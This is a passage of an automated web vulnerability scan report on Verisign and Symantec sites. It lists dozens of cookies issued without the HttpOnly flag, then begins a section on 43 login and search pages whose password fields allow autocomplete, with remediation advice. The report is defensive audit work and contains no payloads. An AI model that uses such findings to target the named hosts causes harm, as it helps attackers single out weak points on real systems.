10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.67. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.68. https://trust-center.verisign.ch/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.69. https://trust-center.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.70. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.71. https://trust-center.verisign.com/process/retail/help_and_support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/help_and_support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.72. https://trust-center.verisign.com/process/retail/redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/redirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.73. https://trust-center.verisign.com/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.74. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/assets/shared/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/hp07/i/vlogo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.118. https://www4.symantec.com/Vrt/wl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www4.symantec.com
Path:	/Vrt/wl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SYMC_TRANS_ID=69836485@@1315604068690; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11. Password field with autocomplete enabled previous next
There are 43 instances of this issue:

http://blogs.verisign.com/
https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/digital-id-support/index.html
https://knowledge.verisign.ch/support/mpki-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/trust-seal-support/index.html
https://knowledge.verisign.com/support/code-signing-support/index
https://knowledge.verisign.com/support/code-signing-support/index.html
https://knowledge.verisign.com/support/digital-id-support/index.html
https://knowledge.verisign.com/support/eca-support/index.html
https://knowledge.verisign.com/support/mpki-for-ssl-support/index
https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
https://knowledge.verisign.com/support/mpki-support/index.html
https://knowledge.verisign.com/support/ssl-certificates-support/index
https://knowledge.verisign.com/support/ssl-certificates-support/index.html
https://knowledge.verisign.com/support/trust-seal-support/index.html
https://products.verisign.com/geocenter/reseller/logon.do
https://products.verisign.com/geocenter/reseller/logon.jsp
https://products.verisign.com/geocenter/reseller/register.do
http://query.verisign.ch/search
http://query.verisign.com/search
https://query.verisign.com/search
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://test-products.verisign.com/geocenter/reseller/logon.do
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.com/process/retail/console_login
http://www.verisign.ch/
http://www.verisign.ch/contact-information/index.html
http://www.verisign.ch/corporate/index.html
http://www.verisign.ch/trust-seal/index.html
http://www.verisign.com/
http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/partners/ssl-reseller-programs/index.html
http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
http://www.verisign.com/ssl/buy-ssl-certificates/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/verisign-worldwide/index.html
https://www.verisign.com/
https://www.verisign.com/products-services/index.html

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. http://blogs.verisign.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://blogs.verisign.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://test-products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /?tid=footer HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
